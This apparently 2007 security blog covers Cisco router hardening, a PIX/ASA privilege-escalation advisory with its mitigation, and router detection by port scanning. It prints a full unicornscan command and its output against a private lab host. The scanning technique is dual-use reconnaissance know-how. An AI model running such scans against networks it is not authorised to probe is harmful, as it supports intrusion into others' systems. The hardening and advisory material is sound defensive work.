1. Practice logging There are a lot of way to perform logging. You can use AAA, syslog and system logging which includes console and vty logins.

2. Use an Authentication Proxy if required If you have an internal server which requires login, you can setup an authentication proxy to make sure users authenticte with the router first before the traffic is allowed into the server. Make sure you setup either a local database or an AAA server for verification of user credentials. This will depend on each organization.

3. Disable Unnecessary services This point here is very important. Never allow services like finger, telnet or snmp if not required. Multiple exploits have been published that can actually compromise the router. So, review your router and check for unwanted services and shut it down.

4. Retrict Access Restrict access like VTY, console, ssh, telnet, etc. I will not mention much about this as it is mentioned with configuration examples in my earlier post.

5. Use autosecure. You can use the auto secure command in in IOS version 12.3 onwards to actually implement router security. This command will enable you to disable CDP finger if not needed. Use this command if you do not know how to configure it manually.

6. Enable the IPS in your router Modern Cisco routers comes with IPS included in the IOS. Enabled it. With IPS enabled, you can log the specific event to a server or drop the packets or forward it to the destination with a reset bit set, if your configuration suspects that this is an attack.

7. Use CBAC This feature allow monitoring of layer 7 protocol like HTTP and FTP. This feature will actually create a session table entry for any connection from any internal users which initiates a connection to the outside world. CBAC can inspect unusual behaviour drop the connection.

8.Use port-to-address mapping (PAM) Use this feature to map to a different port for known services. For example, http runs on port 80, you can actually map it to port 9090. This feature blends well with CBAC.

Pentesting

Ok, so i did a passive fingerprinting last night. Today will be the day i am going to perform an external pentest. Quite frankly speaking, pentesting gets a little boring for me these days. If i had a chance, i would love to try blackbox pentesting in a cisco network environment. I will see what i can find during these 5 days and will blog on it if i found something interesting. Nmap is always the first step in external penetest and yep, i am going to use the same technique discussed earlier. Once this is all set and done, i will try to come back to Cisco which is my favourite. Stay tune for more.

Monday, March 19, 2007

Top IT bloggers

Ok, now i might not be in one of the top IT bloggers, but definitely, one day i will reach there. Jeremiah Grossman, Bruce Schneier and some other greats are this year's top bloggers. Well, check out this article below:

http://www.itsecurity.com/features/top-59-influencers-itsecurity-031407/

Let me know what you think.

Cisco PIX/ASA Privilege Escalation.

Ok, a vulnerability has been discovered which allows privilege escalation in Cisco PIX/ASA Firewall IOS ver 7.2.x to 7.2(2.8). If you are using LOCAL as your local aaa authentication, please change it to radius or Cisco proprietary TACACS+ like,

cisco(config)#aaa authentication login default LOCAL

change it to:

cisco(config)#aaa authentication login default TACACS+ or radius,

I am not so sure about the configuration for TACACS and radius now, as i need to refer but basically, do not use LOCAL if you are using the affected IOS version as mentioned above.

Also, for this exploit to work correctly, a user with privilege level of 0 must be present in the LOCAL database of the PIX/ASA. A user with privilege level of 0 can be escalated to privilege level 15 which is the super privilege level with admin access. So in order to stop this exploit, change the following:

cisco(config)#username cisco privilege 0 password cisco

to

cisco(config)#username cisco privilege 1 password cisco

This change will actually stop this exploit.

You can use show version to see your IOS version.

Detecting Cisco Routers

Ok, its easy to detect cisco routers and there is no doubt about it. Traceroute is a utility to discover the routers and firewalls and i shan't go deep into it. If telnet is opened after performing a port scan, just telnet to the IP address and look at the banner and it will say something like User access verification. And there you go, you just discovered a cisco router or core switch on the internet. Well, thats easy.

Port Scanners are one of the best tool to discover open ports. A vulnerable cisco router with default settings will have many ports open. It just take one vulnerable open port to actually bring the router down. Well, i shan't go too deep on that too. The best port scanners out there that would perform the job would be nmap, unicornscan, hping, sinfp, p0f, xprobe and many others. Do not use these tools without permission to scan the networks. Well, i had been performing pentest for the past 4 years and today i managed to captured screenshots of port scanning my servers.

If you ever find a cisco product and had permission to scan, you can try to use the switches as seen on the screenshots.



Above shows nmap scans on a server. Observe the switches. Of course there are many more switches. These are the ones i normally use.




Above shows the hping scans, notice that the S..A bit is returned back. If you know the TCP/IP three way handshake, this indicates that the ports are opened. Personally, i like using hping, it is a powerful low level TCP/IP tool.








Above diagram shows the Unicornscan, another powerful scanner. This scanner can be used to scan for large networks and can be used to perform DoS. In addition, it is also very very fast. I had attached the results below. There is also tools like sinfp, p0f and xprobe, i shant mention too much here, you can search for it.


BT ~ # unicornscan -mT -vvv -I -r300 -E 192.168.1.55
adding 192.168.1.55/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
using interface(s) eth0
added module payload for port 80 proto 6
added module payload for port 80 proto 6
added module payload for port 518 proto 17
added module payload for port 53 proto 17
added module payload for port 5060 proto 17
added module payload for port 1900 proto 17
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
drone type Unknown on fd 3 is version 1.1
added module payload for port 80 proto 6
added module payload for port 80 proto 6
added module payload for port 518 proto 17
added module payload for port 53 proto 17
added module payload for port 5060 proto 17
added module payload for port 1900 proto 17
opening config file `/usr/local/etc/unicornscan/payloads.conf'
opening config file `/usr/local/etc/unicornscan/modules.conf'
drone type Unknown on fd 5 is version 1.1
scan iteration 1 out of 1
using pcap filter: `dst 192.168.58.129 and ! src 192.168.58.129 and (tcp or icmp)'
using TSC delay
TCP open 192.168.1.55:21 ttl 128
sender statistics 217.4 pps with 338 packets sent total
TCP--R----- 192.168.1.55:32769 ttl 128
TCP--R----- 192.168.1.55:1024 ttl 128
TCP--R----- 192.168.1.55:873 ttl 128
TCP--R----- 192.168.1.55:7001 ttl 128
TCP--R----- 192.168.1.55:1525 ttl 128
TCP--R----- 192.168.1.55:5423 ttl 128
TCP--R----- 192.168.1.55:1028 ttl 128
TCP--R----- 192.168.1.55:63809 ttl 128
TCP--R----- 192.168.1.55:2628 ttl 128
TCP--R----- 192.168.1.55:61603 ttl 128
TCP--R----- 192.168.1.55:53 ttl 128
TCP--R----- 192.168.1.55:54321 ttl 128
TCP--R----- 192.168.1.55:32771 ttl 128
TCP--R----- 192.168.1.55:2345 ttl 128
TCP--R----- 192.168.1.55:164 ttl 128
TCP--R----- 192.168.1.55:3306 ttl 128
TCP--R----- 192.168.1.55:22273 ttl 128
TCP--R----- 192.168.1.55:32768 ttl 128
TCP--R----- 192.168.1.55:1210 ttl 128
TCP--R----- 192.168.1.55:138 ttl 128
TCP--R----- 192.168.1.55:4899 ttl 128
TCP--R----- 192.168.1.55:204 ttl 128
TCP--R----- 192.168.1.55:32773 ttl 128
TCP--R----- 192.168.1.55:406 ttl 128
TCP--R----- 192.168.1.55:444 ttl 128
TCP--R----- 192.168.1.55:109 ttl 128
TCP--R----- 192.168.1.55:6347 ttl 128
TCP--R----- 192.168.1.55:150 ttl 128
TCP--R----- 192.168.1.55:5555 ttl 128
TCP--R----- 192.168.1.55:513 ttl 128
TCP--R----- 192.168.1.55:923 ttl 128
TCP--R----- 192.168.1.55:5002 ttl 128
TCP--R----- 192.168.1.55:8088 ttl 128
TCP--R----- 192.168.1.55:371 ttl 128
TCP--R----- 192.168.1.55:162 ttl 128
TCP--R----- 192.168.1.55:6007 ttl 128
TCP open 192.168.1.55:8081 ttl 128
TCP--R----- 192.168.1.55:6789 ttl 128
TCP--R----- 192.168.1.55:7983 ttl 128
TCP--R----- 192.168.1.55:5556 ttl 128
TCP--R----- 192.168.1.55:6668 ttl 128
TCP--R----- 192.168.1.55:177 ttl 128
TCP--R----- 192.168.1.55:512 ttl 128
TCP--R----- 192.168.1.55:2401 ttl 128
TCP--R----- 192.168.1.55:7007 ttl 128
TCP--R----- 192.168.1.55:1434 ttl 128
TCP--R----- 192.168.1.55:10067 ttl 128
TCP--R----- 192.168.1.55:32776 ttl 128
TCP--R----- 192.168.1.55:17003 ttl 128
TCP--R----- 192.168.1.55:518 ttl 128
TCP--R----- 192.168.1.55:10080 ttl 128
TCP--R----- 192.168.1.55:2776 ttl 128
TCP--R----- 192.168.1.55:65506 ttl 128
TCP--R----- 192.168.1.55:1701 ttl 128
TCP--R----- 192.168.1.55:10027 ttl 128
TCP open 192.168.1.55:139 ttl 128
TCP--R----- 192.168.1.55:1349 ttl 128
TCP--R----- 192.168.1.55:751 ttl 128
TCP--R----- 192.168.1.55:407 ttl 128
TCP--R----- 192.168.1.55:1025 ttl 128
TCP--R----- 192.168.1.55:61000 ttl 128
TCP--R----- 192.168.1.55:17002 ttl 128
TCP--R----- 192.168.1.55:6001 ttl 128
TCP--R----- 192.168.1.55:6000 ttl 128
TCP--R----- 192.168.1.55:191 ttl 128
TCP--R----- 192.168.1.55:992 ttl 128
TCP--R----- 192.168.1.55:213 ttl 128
TCP open 192.168.1.55:1027 ttl 128
TCP--R----- 192.168.1.55:58008 ttl 128
TCP--R----- 192.168.1.55:525 ttl 128
TCP--R----- 192.168.1.55:32770 ttl 128
TCP--R----- 192.168.1.55:64429 ttl 128
TCP--R----- 192.168.1.55:31789 ttl 128
TCP--R----- 192.168.1.55:209 ttl 128
TCP--R----- 192.168.1.55:5422 ttl 128
TCP--R----- 192.168.1.55:1755 ttl 128
TCP--R----- 192.168.1.55:6005 ttl 128
TCP--R----- 192.168.1.55:765 ttl 128
TCP--R----- 192.168.1.55:9101 ttl 128
TCP--R----- 192.168.1.55:32767 ttl 128
TCP--R----- 192.168.1.55:2050 ttl 128
TCP--R----- 192.168.1.55:3150 ttl 128
TCP--R----- 192.168.1.55:65534 ttl 128
TCP--R----- 192.168.1.55:1646 ttl 128
TCP--R----- 192.168.1.55:2103 ttl 128
TCP--R----- 192.168.1.55:47262 ttl 128
TCP--R----- 192.168.1.55:25 ttl 128
TCP--R----- 192.168.1.55:345 ttl 128
TCP--R----- 192.168.1.55:5137 ttl 128
TCP--R----- 192.168.1.55:113 ttl 128
TCP--R----- 192.168.1.55:7002 ttl 128
TCP--R----- 192.168.1.55:65533 ttl 128
TCP--R----- 192.168.1.55:5136 ttl 128
TCP--R----- 192.168.1.55:19 ttl 128
TCP--R----- 192.168.1.55:58666 ttl 128
TCP--R----- 192.168.1.55:5425 ttl 128
TCP--R----- 192.168.1.55:31336 ttl 128
TCP--R----- 192.168.1.55:9103 ttl 128
TCP--R----- 192.168.1.55:422 ttl 128
TCP--R----- 192.168.1.55:60000 ttl 128
TCP--R----- 192.168.1.55:10167 ttl 128
TCP--R----- 192.168.1.55:2140 ttl 128
TCP--R----- 192.168.1.55:657 ttl 128
TCP--R----- 192.168.1.55:161 ttl 128
TCP--R----- 192.168.1.55:129 ttl 128
TCP--R----- 192.168.1.55:9359 ttl 128
TCP--R----- 192.168.1.55:2048 ttl 128
TCP--R----- 192.168.1.55:636 ttl 128
TCP--R----- 192.168.1.55:1718 ttl 128
TCP--R----- 192.168.1.55:63485 ttl 128
TCP--R----- 192.168.1.55:1026 ttl 128
TCP--R----- 192.168.1.55:80 ttl 128
TCP--R----- 192.168.1.55:2432 ttl 128
TCP--R----- 192.168.1.55:79 ttl 128
TCP--R----- 192.168.1.55:6669 ttl 128
TCP--R----- 192.168.1.55:23 ttl 128
TCP--R----- 192.168.1.55:1645 ttl 128
TCP--R----- 192.168.1.55:118 ttl 128
TCP--R----- 192.168.1.55:210 ttl 128
TCP--R----- 192.168.1.55:5308 ttl 128
TCP--R----- 192.168.1.55:49301 ttl 128
TCP--R----- 192.168.1.55:7000 ttl 128
TCP--R----- 192.168.1.55:107 ttl 128
TCP--R----- 192.168.1.55:642 ttl 128
TCP--R----- 192.168.1.55:347 ttl 128
TCP--R----- 192.168.1.55:111 ttl 128
TCP--R----- 192.168.1.55:548 ttl 128
TCP--R----- 192.168.1.55:8787 ttl 128
TCP--R----- 192.168.1.55:3801 ttl 128
TCP--R----- 192.168.1.55:6667 ttl 128
TCP--R----- 192.168.1.55:6346 ttl 128
TCP--R----- 192.168.1.55:372 ttl 128
TCP--R----- 192.168.1.55:5222 ttl 128
TCP--R----- 192.168.1.55:9325 ttl 128
TCP--R----- 192.168.1.55:1812 ttl 128
TCP--R----- 192.168.1.55:5138 ttl 128
TCP--R----- 192.168.1.55:6670 ttl 128
TCP--R----- 192.168.1.55:31791 ttl 128
TCP--R----- 192.168.1.55:3130 ttl 128
TCP--R----- 192.168.1.55:9102 ttl 128
TCP--R----- 192.168.1.55:49 ttl 128
TCP--R----- 192.168.1.55:1524 ttl 128
TCP--R----- 192.168.1.55:31790 ttl 128
TCP--R----- 192.168.1.55:13 ttl 128
TCP--R----- 192.168.1.55:3389 ttl 128
TCP--R----- 192.168.1.55:666 ttl 128
TCP--R----- 192.168.1.55:98 ttl 128
TCP--R----- 192.168.1.55:3543 ttl 128
TCP--R----- 192.168.1.55:10081 ttl 128
TCP--R----- 192.168.1.55:70 ttl 128
TCP--R----- 192.168.1.55:6543 ttl 128
TCP--R----- 192.168.1.55:65000 ttl 128
TCP--R----- 192.168.1.55:1720 ttl 128
TCP--R----- 192.168.1.55:5139 ttl 128
TCP--R----- 192.168.1.55:68 ttl 128
TCP--R----- 192.168.1.55:6544 ttl 128
TCP--R----- 192.168.1.55:7005 ttl 128
TCP--R----- 192.168.1.55:22 ttl 128
TCP--R----- 192.168.1.55:9 ttl 128
TCP--R----- 192.168.1.55:1080 ttl 128
TCP--R----- 192.168.1.55:533 ttl 128
TCP--R----- 192.168.1.55:2430 ttl 128
TCP--R----- 192.168.1.55:123 ttl 128
TCP--R----- 192.168.1.55:370 ttl 128
TCP--R----- 192.168.1.55:1234 ttl 128
TCP--R----- 192.168.1.55:60006 ttl 128
TCP--R----- 192.168.1.55:520 ttl 128
TCP--R----- 192.168.1.55:32774 ttl 128
TCP--R----- 192.168.1.55:32668 ttl 128
TCP--R----- 192.168.1.55:2233 ttl 128
TCP--R----- 192.168.1.55:6006 ttl 128
TCP--R----- 192.168.1.55:612 ttl 128
TCP--R----- 192.168.1.55:65532 ttl 128
TCP--R----- 192.168.1.55:26274 ttl 128
TCP--R----- 192.168.1.55:88 ttl 128
TCP--R----- 192.168.1.55:995 ttl 128
TCP--R----- 192.168.1.55:50 ttl 128
TCP--R----- 192.168.1.55:538 ttl 128
TCP--R----- 192.168.1.55:2583 ttl 128
TCP--R----- 192.168.1.55:199 ttl 128
TCP--R----- 192.168.1.55:487 ttl 128
TCP--R----- 192.168.1.55:8879 ttl 128
TCP--R----- 192.168.1.55:2101 ttl 128
TCP--R----- 192.168.1.55:9090 ttl 128
TCP--R----- 192.168.1.55:3544 ttl 128
TCP--R----- 192.168.1.55:220 ttl 128
TCP--R----- 192.168.1.55:11201 ttl 128
TCP--R----- 192.168.1.55:7008 ttl 128
TCP--R----- 192.168.1.55:4000 ttl 128
TCP--R----- 192.168.1.55:6004 ttl 128
TCP--R----- 192.168.1.55:20012 ttl 128
TCP--R----- 192.168.1.55:6002 ttl 128
TCP--R----- 192.168.1.55:1433 ttl 128
TCP--R----- 192.168.1.55:1424 ttl 128
TCP--R----- 192.168.1.55:901 ttl 128
TCP--R----- 192.168.1.55:110 ttl 128
TCP--R----- 192.168.1.55:3232 ttl 128
TCP--R----- 192.168.1.55:1334 ttl 128
TCP--R----- 192.168.1.55:61466 ttl 128
TCP--R----- 192.168.1.55:58009 ttl 128
TCP--R----- 192.168.1.55:1352 ttl 128
TCP--R----- 192.168.1.55:2150 ttl 128
TCP--R----- 192.168.1.55:37 ttl 128
TCP--R----- 192.168.1.55:54320 ttl 128
TCP--R----- 192.168.1.55:7 ttl 128
TCP--R----- 192.168.1.55:59211 ttl 128
TCP--R----- 192.168.1.55:5355 ttl 128
TCP--R----- 192.168.1.55:443 ttl 128
listener statistics 418 packets recieved 0 packets droped and 0 interface drops
TCP--R----- echo[ 7] from 192.168.1.55 ttl 128
TCP--R----- discard[ 9] from 192.168.1.55 ttl 128
TCP--R----- daytime[ 13] from 192.168.1.55 ttl 128
TCP--R----- chargen[ 19] from 192.168.1.55 ttl 128
TCP open ftp[ 21] from 192.168.1.55 ttl 128
TCP--R----- ssh[ 22] from 192.168.1.55 ttl 128
TCP--R----- telnet[ 23] from 192.168.1.55 ttl 128
TCP--R----- smtp[ 25] from 192.168.1.55 ttl 128
TCP--R----- time[ 37] from 192.168.1.55 ttl 128
TCP--R----- tacacs[ 49] from 192.168.1.55 ttl 128
TCP--R----- re-mail-ck[ 50] from 192.168.1.55 ttl 128
TCP--R----- domain[ 53] from 192.168.1.55 ttl 128
TCP--R----- bootpc[ 68] from 192.168.1.55 ttl 128
TCP--R----- gopher[ 70] from 192.168.1.55 ttl 128
TCP--R----- finger[ 79] from 192.168.1.55 ttl 128
TCP--R----- http[ 80] from 192.168.1.55 ttl 128
TCP--R----- kerberos[ 88] from 192.168.1.55 ttl 128
TCP--R----- tacnews[ 98] from 192.168.1.55 ttl 128
TCP--R----- rtelnet[ 107] from 192.168.1.55 ttl 128
TCP--R----- pop2[ 109] from 192.168.1.55 ttl 128
TCP--R----- pop3[ 110] from 192.168.1.55 ttl 128
TCP--R----- sunrpc[ 111] from 192.168.1.55 ttl 128
TCP--R----- ident[ 113] from 192.168.1.55 ttl 128
TCP--R----- sqlserv[ 118] from 192.168.1.55 ttl 128
TCP--R----- ntp[ 123] from 192.168.1.55 ttl 128
TCP--R----- pwdgen[ 129] from 192.168.1.55 ttl 128
TCP--R----- netbios-dgm[ 138] from 192.168.1.55 ttl 128
TCP open netbios-ssn[ 139] from 192.168.1.55 ttl 128
TCP--R----- sql-net[ 150] from 192.168.1.55 ttl 128
TCP--R----- snmp[ 161] from 192.168.1.55 ttl 128
TCP--R----- snmptrap[ 162] from 192.168.1.55 ttl 128
TCP--R----- cmip-agent[ 164] from 192.168.1.55 ttl 128
TCP--R----- xdmcp[ 177] from 192.168.1.55 ttl 128
TCP--R----- prospero[ 191] from 192.168.1.55 ttl 128
TCP--R----- smux[ 199] from 192.168.1.55 ttl 128
TCP--R----- at-echo[ 204] from 192.168.1.55 ttl 128
TCP--R----- qmtp[ 209] from 192.168.1.55 ttl 128
TCP--R----- z39.50[ 210] from 192.168.1.55 ttl 128
TCP--R----- ipx[ 213] from 192.168.1.55 ttl 128
TCP--R----- imap3[ 220] from 192.168.1.55 ttl 128
TCP--R----- pawserv[ 345] from 192.168.1.55 ttl 128
TCP--R----- fatserv[ 347] from 192.168.1.55 ttl 128
TCP--R----- codaauth2[ 370] from 192.168.1.55 ttl 128
TCP--R----- clearcase[ 371] from 192.168.1.55 ttl 128
TCP--R----- ulistproc[ 372] from 192.168.1.55 ttl 128
TCP--R----- imsp[ 406] from 192.168.1.55 ttl 128
TCP--R----- timbuktu[ 407] from 192.168.1.55 ttl 128
TCP--R----- ariel3[ 422] from 192.168.1.55 ttl 128
TCP--R----- https[ 443] from 192.168.1.55 ttl 128
TCP--R----- snpp[ 444] from 192.168.1.55 ttl 128
TCP--R----- saft[ 487] from 192.168.1.55 ttl 128
TCP--R----- exec[ 512] from 192.168.1.55 ttl 128
TCP--R----- login[ 513] from 192.168.1.55 ttl 128
TCP--R----- ntalk[ 518] from 192.168.1.55 ttl 128
TCP--R----- efs[ 520] from 192.168.1.55 ttl 128
TCP--R----- timed[ 525] from 192.168.1.55 ttl 128
TCP--R----- netwall[ 533] from 192.168.1.55 ttl 128
TCP--R----- gdomap[ 538] from 192.168.1.55 ttl 128
TCP--R----- afpovertcp[ 548] from 192.168.1.55 ttl 128
TCP--R----- hmmp-ind[ 612] from 192.168.1.55 ttl 128
TCP--R----- ldaps[ 636] from 192.168.1.55 ttl 128
TCP--R----- esro-emsdp[ 642] from 192.168.1.55 ttl 128
TCP--R----- rmc[ 657] from 192.168.1.55 ttl 128
TCP--R----- mdqs[ 666] from 192.168.1.55 ttl 128
TCP--R----- pump[ 751] from 192.168.1.55 ttl 128
TCP--R----- webster[ 765] from 192.168.1.55 ttl 128
TCP--R----- rsync[ 873] from 192.168.1.55 ttl 128
TCP--R----- smpnameres[ 901] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 923] from 192.168.1.55 ttl 128
TCP--R----- telnets[ 992] from 192.168.1.55 ttl 128
TCP--R----- pop3s[ 995] from 192.168.1.55 ttl 128
TCP--R----- reserved[ 1024] from 192.168.1.55 ttl 128
TCP--R----- blackjack[ 1025] from 192.168.1.55 ttl 128
TCP--R----- cap[ 1026] from 192.168.1.55 ttl 128
TCP open exosee[ 1027] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 1028] from 192.168.1.55 ttl 128
TCP--R----- socks[ 1080] from 192.168.1.55 ttl 128
TCP--R----- eoss[ 1210] from 192.168.1.55 ttl 128
TCP--R----- search-agent[ 1234] from 192.168.1.55 ttl 128
TCP--R----- writesrv[ 1334] from 192.168.1.55 ttl 128
TCP--R----- sbook[ 1349] from 192.168.1.55 ttl 128
TCP--R----- lotusnote[ 1352] from 192.168.1.55 ttl 128
TCP--R----- hybrid[ 1424] from 192.168.1.55 ttl 128
TCP--R----- ms-sql-s[ 1433] from 192.168.1.55 ttl 128
TCP--R----- ms-sql-m[ 1434] from 192.168.1.55 ttl 128
TCP--R----- ingreslock[ 1524] from 192.168.1.55 ttl 128
TCP--R----- orasrv[ 1525] from 192.168.1.55 ttl 128
TCP--R----- sightline[ 1645] from 192.168.1.55 ttl 128
TCP--R----- sa-msg-port[ 1646] from 192.168.1.55 ttl 128
TCP--R----- l2f[ 1701] from 192.168.1.55 ttl 128
TCP--R----- h323gatedisc[ 1718] from 192.168.1.55 ttl 128
TCP--R----- h323hostcall[ 1720] from 192.168.1.55 ttl 128
TCP--R----- ms-streaming[ 1755] from 192.168.1.55 ttl 128
TCP--R----- radius[ 1812] from 192.168.1.55 ttl 128
TCP--R----- dls-monitor[ 2048] from 192.168.1.55 ttl 128
TCP--R----- av-emb-config[ 2050] from 192.168.1.55 ttl 128
TCP--R----- rtcm-sc104[ 2101] from 192.168.1.55 ttl 128
TCP--R----- zephyr-clt[ 2103] from 192.168.1.55 ttl 128
TCP--R----- ias-reg[ 2140] from 192.168.1.55 ttl 128
TCP--R----- dynamic3d[ 2150] from 192.168.1.55 ttl 128
TCP--R----- infocrypt[ 2233] from 192.168.1.55 ttl 128
TCP--R----- dbm[ 2345] from 192.168.1.55 ttl 128
TCP--R----- cvspserver[ 2401] from 192.168.1.55 ttl 128
TCP--R----- venus[ 2430] from 192.168.1.55 ttl 128
TCP--R----- codasrv[ 2432] from 192.168.1.55 ttl 128
TCP--R----- mon[ 2583] from 192.168.1.55 ttl 128
TCP--R----- dict[ 2628] from 192.168.1.55 ttl 128
TCP--R----- ridgeway1[ 2776] from 192.168.1.55 ttl 128
TCP--R----- icpv2[ 3130] from 192.168.1.55 ttl 128
TCP--R----- nm-asses-admin[ 3150] from 192.168.1.55 ttl 128
TCP--R----- mdtp[ 3232] from 192.168.1.55 ttl 128
TCP--R----- mysql[ 3306] from 192.168.1.55 ttl 128
TCP--R----- ms-wbt-server[ 3389] from 192.168.1.55 ttl 128
TCP--R----- qftest-lookup[ 3543] from 192.168.1.55 ttl 128
TCP--R----- teredo[ 3544] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 3801] from 192.168.1.55 ttl 128
TCP--R----- terabase[ 4000] from 192.168.1.55 ttl 128
TCP--R----- radmin-port[ 4899] from 192.168.1.55 ttl 128
TCP--R----- rfe[ 5002] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 5136] from 192.168.1.55 ttl 128
TCP--R----- ctsd[ 5137] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 5138] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 5139] from 192.168.1.55 ttl 128
TCP--R----- xmpp-client[ 5222] from 192.168.1.55 ttl 128
TCP--R----- cfengine[ 5308] from 192.168.1.55 ttl 128
TCP--R----- llmnr[ 5355] from 192.168.1.55 ttl 128
TCP--R----- salient-mux[ 5422] from 192.168.1.55 ttl 128
TCP--R----- virtualuser[ 5423] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 5425] from 192.168.1.55 ttl 128
TCP--R----- rplay[ 5555] from 192.168.1.55 ttl 128
TCP--R----- rplay[ 5556] from 192.168.1.55 ttl 128
TCP--R----- x11[ 6000] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6001] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6002] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6004] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6005] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6006] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6007] from 192.168.1.55 ttl 128
TCP--R----- gnutella-svc[ 6346] from 192.168.1.55 ttl 128
TCP--R----- gnutella-rtr[ 6347] from 192.168.1.55 ttl 128
TCP--R----- lds-distrib[ 6543] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 6544] from 192.168.1.55 ttl 128
TCP--R----- irc[ 6667] from 192.168.1.55 ttl 128
TCP--R----- irc[ 6668] from 192.168.1.55 ttl 128
TCP--R----- irc[ 6669] from 192.168.1.55 ttl 128
TCP--R----- vocaltec-gold[ 6670] from 192.168.1.55 ttl 128
TCP--R----- smc-https[ 6789] from 192.168.1.55 ttl 128
TCP--R----- afs3-fileserver[ 7000] from 192.168.1.55 ttl 128
TCP--R----- afs3-callback[ 7001] from 192.168.1.55 ttl 128
TCP--R----- afs3-prserver[ 7002] from 192.168.1.55 ttl 128
TCP--R----- afs3-volser[ 7005] from 192.168.1.55 ttl 128
TCP--R----- afs3-bos[ 7007] from 192.168.1.55 ttl 128
TCP--R----- afs3-update[ 7008] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 7983] from 192.168.1.55 ttl 128
TCP open unknown[ 8081] from 192.168.1.55 ttl 128
TCP--R----- radan-http[ 8088] from 192.168.1.55 ttl 128
TCP--R----- msgsrvr[ 8787] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 8879] from 192.168.1.55 ttl 128
TCP--R----- websm[ 9090] from 192.168.1.55 ttl 128
TCP--R----- bacula-dir[ 9101] from 192.168.1.55 ttl 128
TCP--R----- bacula-fd[ 9102] from 192.168.1.55 ttl 128
TCP--R----- bacula-sd[ 9103] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 9325] from 192.168.1.55 ttl 128
TCP--R----- unknown[ 9359] from 192.168.1.55 ttl 128
TCP--R----- unknown[10027] from 192.168.1.55 ttl 128
TCP--R----- unknown[10067] from 192.168.1.55 ttl 128
TCP--R----- amanda[10080] from 192.168.1.55 ttl 128
TCP--R----- unknown[10081] from 192.168.1.55 ttl 128
TCP--R----- unknown[10167] from 192.168.1.55 ttl 128
TCP--R----- smsqp[11201] from 192.168.1.55 ttl 128
TCP--R----- unknown[17002] from 192.168.1.55 ttl 128
TCP--R----- unknown[17003] from 192.168.1.55 ttl 128
TCP--R----- unknown[20012] from 192.168.1.55 ttl 128
TCP--R----- wnn6[22273] from 192.168.1.55 ttl 128
TCP--R----- unknown[26274] from 192.168.1.55 ttl 128
TCP--R----- unknown[31336] from 192.168.1.55 ttl 128
TCP--R----- unknown[31789] from 192.168.1.55 ttl 128
TCP--R----- unknown[31790] from 192.168.1.55 ttl 128
TCP--R----- unknown[31791] from 192.168.1.55 ttl 128
TCP--R----- unknown[32668] from 192.168.1.55 ttl 128
TCP--R----- unknown[32767] from 192.168.1.55 ttl 128
TCP--R----- filenet-tms[32768] from 192.168.1.55 ttl 128
TCP--R----- filenet-rpc[32769] from 192.168.1.55 ttl 128
TCP--R----- filenet-nch[32770] from 192.168.1.55 ttl 128
TCP--R----- filenet-rmi[32771] from 192.168.1.55 ttl 128
TCP--R----- filenet-cm[32773] from 192.168.1.55 ttl 128
TCP--R----- filenet-re[32774] from 192.168.1.55 ttl 128
TCP--R----- unknown[32776] from 192.168.1.55 ttl 128
TCP--R----- unknown[47262] from 192.168.1.55 ttl 128
TCP--R----- unknown[49301] from 192.168.1.55 ttl 128
TCP--R----- unknown[54320] from 192.168.1.55 ttl 128
TCP--R----- unknown[54321] from 192.168.1.55 ttl 128
TCP--R----- unknown[58008] from 192.168.1.55 ttl 128
TCP--R----- unknown[58009] from 192.168.1.55 ttl 128
TCP--R----- unknown[58666] from 192.168.1.55 ttl 128
TCP--R----- unknown[59211] from 192.168.1.55 ttl 128
TCP--R----- unknown[60000] from 192.168.1.55 ttl 128
TCP--R----- unknown[60006] from 192.168.1.55 ttl 128
TCP--R----- unknown[61000] from 192.168.1.55 ttl 128
TCP--R----- unknown[61466] from 192.168.1.55 ttl 128
TCP--R----- unknown[61603] from 192.168.1.55 ttl 128
TCP--R----- unknown[63485] from 192.168.1.55 ttl 128
TCP--R----- unknown[63809] from 192.168.1.55 ttl 128
TCP--R----- unknown[64429] from 192.168.1.55 ttl 128
TCP--R----- unknown[65000] from 192.168.1.55 ttl 128
TCP--R----- unknown[65506] from 192.168.1.55 ttl 128
TCP--R----- unknown[65532] from 192.168.1.55 ttl 128
TCP--R----- unknown[65533] from 192.168.1.55 ttl 128
TCP--R----- unknown[65534] from 192.168.1.55 ttl 128
main exiting

